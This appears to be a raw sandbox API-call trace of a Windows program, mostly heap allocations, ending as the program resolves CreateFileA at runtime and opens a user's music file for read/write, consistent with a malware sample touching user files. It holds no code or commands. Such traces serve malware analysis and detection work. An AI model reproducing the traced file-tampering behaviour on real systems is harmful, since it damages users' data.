RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.841] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.844] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.846] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.846] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca48 [0038.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.846] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0038.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.847] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0038.847] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f36e0 [0038.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", cchWideChar=78, lpMultiByteStr=0x7f36e0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpUsedDefaultChar=0x0) returned 78 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.848] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\zah-2jgjs1xf027twp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9c) returned 0x7d8558 [0038.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=78, lpWideCharStr=0x7d8558, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav") returned 78 [0038.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.849] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.849] HeapFree (in: hHeap=0x770000, 